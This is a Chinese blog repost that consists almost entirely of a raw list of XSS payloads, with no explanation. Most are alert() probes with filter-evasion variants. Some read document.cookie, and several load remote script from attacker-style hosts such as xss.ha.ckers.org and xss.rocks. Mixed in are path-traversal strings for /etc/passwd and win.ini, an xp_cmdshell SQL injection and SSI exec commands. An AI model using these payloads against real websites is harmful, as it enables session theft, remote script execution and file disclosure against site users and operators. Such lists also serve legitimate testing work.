热门标签
热门文章
- 1python里with怎么用_with 语句怎么使用
- 2docker 常用指令(启动,关闭,查看运行状态)
- 3web Service 工具类_命令创建webservice工具类
- 4爬取贝壳和房天下——北京二手房在售和已成交百万级别数据(附详细思路和部分源码)_贝壳最新成交数据需要登陆
- 5双指针—安排会议日程(leetcode 1229)_安排会议日程leetcode
- 6CLUE:中文语言理解测评基准及NLP中文数据集_clue数据集
- 7linux错误码分析_recv-q 101
- 8Linux系统运维命令:查看cache里的URL,即查看系统访问了哪些包含http的url(使用grep结合awk,组合命令实现功能)
- 9esxi安装威联通_宅家新姿势—威联通NAS安装套件版Emby搭建家庭影音服务器
- 10十五届蓝桥杯第三期模拟赛题单(C++、java、Python)_第十五蓝桥杯模拟赛第三期题目
当前位置: article > 正文
XSS 攻击常用代码_xss攻击代码
作者:我家小花儿 | 2024-02-27 04:33:27
赞
踩
xss攻击代码
1. XSS 攻击常用代码
1'"()&%<acx><ScRiPt >prompt(915149)</ScRiPt> <svg/onload=alert(1)> <script>alert(document.cookie)</script> '><script>alert(document.cookie)</script> ='><script>alert(document.cookie)</script> <script>alert(vulnerable)</script> %3Cscript%3Ealert('XSS')%3C/script%3E <script>alert('XSS')</script> <img src="javascript:alert('XSS')"> %0a%0a<script>alert(\"Vulnerable\")</script>.jsp %22%3cscript%3ealert(%22xss%22)%3c/script%3e %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html <script>alert('Vulnerable');</script> <script>alert('Vulnerable')</script> a.jsp/<script>alert('Vulnerable')</script> a?<script>alert('Vulnerable')</script> "><script>alert('Vulnerable')</script> ';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&& %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E %3Cscript%3Ealert(document. domain);%3C/script%3E& %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID= <IMG src="javascript:alert('XSS');"> <IMG src=javascript:alert('XSS')> <IMG src=JaVaScRiPt:alert('XSS')> <IMG src=JaVaScRiPt:alert("XSS")> <IMG src=javascript:alert('XSS')> <IMG src=javascript:alert('XSS')> <IMG src=javascript:alert('XSS')> <IMG src="jav ascript:alert('XSS');"> <IMG src="jav ascript:alert('XSS');"> <IMG src="jav ascript:alert('XSS');"> "<IMG src=java\0script:alert(\"XSS\")>";' > out <IMG src=" javascript:alert('XSS');"> <SCRIPT>a=/XSS/alert(a.source)</SCRIPT> <BODY BACKGROUND="javascript:alert('XSS')"> <BODY ONLOAD=alert('XSS')> <IMG DYNSRC="javascript:alert('XSS')"> <IMG LOWSRC="javascript:alert('XSS')"> <BGSOUND src="javascript:alert('XSS');"> <br size="&{alert('XSS')}"> <LAYER src="http://xss.ha.ckers.org/a.js"></layer> <LINK REL="stylesheet" href="javascript:alert('XSS');"> <IMG src='vbscript:msgbox("XSS")'> <IMG src="mocha:[code]"> <IMG src="livescript:[code]"> <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> <IFRAME src=javascript:alert('XSS')></IFRAME> <FRAMESET><FRAME src=javascript:alert('XSS')></FRAME></FRAMESET> <TABLE BACKGROUND="javascript:alert('XSS')"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');"> <DIV STYLE="width: expression(alert('XSS'));"> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG STYLE='xss:expre\ssion(alert("XSS"))'> <STYLE TYPE="text/javascript">alert('XSS');</STYLE> <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A class="XSS"></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <BASE href="javascript:alert('XSS');//"> getURL("javascript:alert('XSS')") a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d); <XML src="javascript:alert('XSS');"> "> <BODY><SCRIPT>function a(){alert('XSS');}</SCRIPT><" <SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT> <IMG src="javascript:alert('XSS')" <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"--> <IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> <SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT> <SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT> <SCRIPT a=">" '' src="http://xss.ha.ckers.org/a.js"></SCRIPT> <SCRIPT "a='>'" src="http://xss.ha.ckers.org/a.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT> <A href=http://www.gohttp://www.google.com/ogle.com/>link</A> <IMG SRC=javascript:alert(‘XSS’)> <IMG SRC=# onmouseover=”alert(‘xxs’)”> <IMG SRC=/ onerror=”alert(String.fromCharCode(88,83,83))”></img> <img src=x onerror=”javascript:alert('XSS')″> <IMG SRC=javascript:alert( 'XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=”jav ascript:alert(‘XSS’);”> <IMG SRC=”jav
ascript:alert(‘XSS’);”> <IMG SRC=”  javascript:alert(‘XSS’);”> <<SCRIPT>alert(“XSS”);//<</SCRIPT> <IMG SRC=”javascript:alert(‘XSS’)” </script><script>alert(‘XSS’);</script> <INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”> <BODY BACKGROUND=”javascript:alert(‘XSS’)”> <svg/onload=alert('XSS')> <IMG SRC=’vbscript:msgbox(“XSS”)’> <BGSOUND SRC="javascript:alert('XSS');"> <BR SIZE="&{alert('XSS')}"> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <XSS STYLE="behavior: url(xss.htc);"> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <TABLE><TD BACKGROUND="javascript:alert('XSS')"> <DIV STYLE="width: expression(alert('XSS'));"> <SCRIPT a=">" SRC="httx://xss.rocks/xss.js"></SCRIPT> <script>alert(/xss/)</script> <svg onload=alert(document.domain)> <img src=document.domain onerror=alert(document.domain)> <M onmouseover=alert(document.domain)>M <marquee onscroll=alert(document.domain)> <a href=javascript:alert(document.domain)>M</a> <body onload=alert(document.domain)> <details open ontoggle=alert(document.domain)> <embed src=javascript:alert(document.domain)> <script>alert(1)</script> <sCrIpT>alert(1)</sCrIpT> <ScRiPt>alert(1)</ScRiPt> <sCrIpT>alert(1)</ScRiPt> <ScRiPt>alert(1)</sCrIpT> <img src=1 onerror=alert(1)> <iMg src=1 oNeRrOr=alert(1)> <ImG src=1 OnErRoR=alert(1)> <img src=1 onerror="alert("M")"> <marquee onscroll=alert(1)> <mArQuEe OnScRoLl=alert(1)> <MaRqUeE oNsCrOlL=alert(1)> <a href=javascript:/0/,alert(%22M%22)>M</a> <a href=javascript:/00/,alert(%22M%22)>M</a> <a href=javascript:/000/,alert(%22M%22)>M</a> <a href=javascript:/M/,alert(%22M%22)>M</a> <base href=javascript:/M/><a href=,alert(1)>M</a> <base href=javascript:/M/><iframe src=,alert(1)></iframe> </textarea><script>var a=1//@ sourceMappingURL=//xss.site</script> "><img src=x onerror=alert(document.cookie)>.gif <div style="background-image:url(javascript:alert(/xss/))"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <iframe src=javascript:alert(1)></iframe> <iframe src="data:text/html,<iframe src=javascript:alert('M')></iframe>"></iframe> <iframe src=data:text/html;base64,PGlmcmFtZSBzcmM9amF2YXNjcmlwdDphbGVydCgiTWFubml4Iik+PC9pZnJhbWU+></iframe> <iframe srcdoc=<svg/onload=alert(1)>></iframe> <iframe src=https://baidu.com width=1366 height=768></iframe> <iframe src=javascript:alert(1) width=1366 height=768></iframe <form action=javascript:alert(1)><input type=submit> <form><button formaction=javascript:alert(1)>M <form><input formaction=javascript:alert(1) type=submit value=M> <form><input formaction=javascript:alert(1) type=image value=M> <form><input formaction=javascript:alert(1) type=image src=1> <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
- 71
- 72
- 73
- 74
- 75
- 76
- 77
- 78
- 79
- 80
- 81
- 82
- 83
- 84
- 85
- 86
- 87
- 88
- 89
- 90
- 91
- 92
- 93
- 94
- 95
- 96
- 97
- 98
- 99
- 100
- 101
- 102
- 103
- 104
- 105
- 106
- 107
- 108
- 109
- 110
- 111
- 112
- 113
- 114
- 115
- 116
- 117
- 118
- 119
- 120
- 121
- 122
- 123
- 124
- 125
- 126
- 127
- 128
- 129
- 130
- 131
- 132
- 133
- 134
- 135
- 136
- 137
- 138
- 139
- 140
- 141
- 142
- 143
- 144
- 145
- 146
- 147
- 148
- 149
- 150
- 151
- 152
- 153
- 154
- 155
- 156
- 157
- 158
- 159
- 160
- 161
- 162
- 163
- 164
- 165
- 166
- 167
- 168
- 169
- 170
- 171
- 172
- 173
- 174
- 175
- 176
- 177
- 178
- 179
- 180
- 181
- 182
- 183
- 184
- 185
- 186
- 187
- 188
- 189
- 190
- 191
- 192
- 193
- 194
- 195
- 196
- 197
- 198
- 199
- 200
- 201
- 202
- 203
- 204
- 205
- 206
- 207
- 208
- 209
- 210
- 211
- 212
- 213
- 214
- 215
- 216
- 217
- 218
- 219
- 220
- 221
- 222
- 223
- 224
- 225
- 226
- 227
- 228
- 229
- 230
- 231
- 232
- 233
- 234
- 235
- 236
- 237
- 238
- 239
- 240
- 241
- 242
- 243
- 244
- 245
- 246
- 247
- 248
- 249
- 250
- 251
- 252
- 253
- 254
- 255
- 256
- 257
- 258
- 259
- 260
- 261
- 262
- 263
- 264
- 265
- 266
- 267
- 268
- 269
- 270
- 271
- 272
- 273
- 274
- 275
- 276
- 277
- 278
- 279
- 280
- 281
- 282
- 283
- 284
- 285
- 286
- 287
- 288
- 289
- 290
- 291
- 292
- 293
- 294
- 295
- 296
- 297
- 298
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/我家小花儿/article/detail/150067
推荐阅读
相关标签
